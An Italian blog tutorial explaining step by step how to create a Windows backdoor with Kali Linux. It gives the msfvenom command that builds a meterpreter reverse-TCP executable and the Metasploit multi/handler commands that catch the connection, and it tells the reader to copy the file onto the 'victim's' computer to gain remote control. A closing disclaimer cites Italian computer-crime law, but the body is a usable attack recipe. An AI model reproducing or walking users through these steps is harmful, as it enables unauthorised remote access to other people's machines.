Oggi ho intenzione di spiegarvi il procedimento mediante il quale possiamo noi stessi creare una backdoor manualmente con Kali Linux, senza far uso dei “consueti comandi” che portano a termine l’attacco autonomamente. Per farlo ricordo di ricorrere a Kali Linux, che come noterete è il principale punto di riferimento per svolgere questo tipo di attacchi. Il funzionamento della procedura che stiamo per andare ad analizzare è abbastanza semplice; si tratta di creare una backdoor alla quale potremo darle qualsiasi tipo di formato, ma visto che ci troviamo a che fare con PC il più raccomandato è di certo il .exe; successivamente Kali creerà il file che noi andremo a trasferire manualmente sul computer della vittima e a quel punto potremo andare ad avviare l’exploit dal terminale. Ma dopo questa spiegazione passiamo alla pratica, per chiarire l’argomento.

Come primo passo andremo ad aprire un terminale; una volta aperto andremo ad eseguire in successione una serie di comandi:

-msfvenom -p windows/meterpreter/reverse_tcp LHOST=(immettere indirizzo IP locale) LPORT=(immettere porta locale) R > “nome della backdoor.exe”

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-Verrà quindi creato il file backdoor.exe

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

 

-msfconsole

andrà ad aprire l’interfaccia di Metasploit Framework

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-use exploit/multi/handler

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-set payload windows/meterpreter/reverse_tcp

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-set LHOST (immettere indirizzo IP locale già  scelto in precedenza)

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-set LPORT (immettere la stessa porta locale scelta prima)

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

-Trasferire la backdoor sul computer della vittima

-exploit

Creare una backdoor manualmente con Kali Linux

 

 

 

 

 

 

Se tutto andrà bene, il nostro PC riuscirà a stabilire una connessione remota mediante questa “backdoor artigianale”. Potete venire a conoscenza di tutte le azioni che potete svolgere digitando come al solito il comando “help”

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.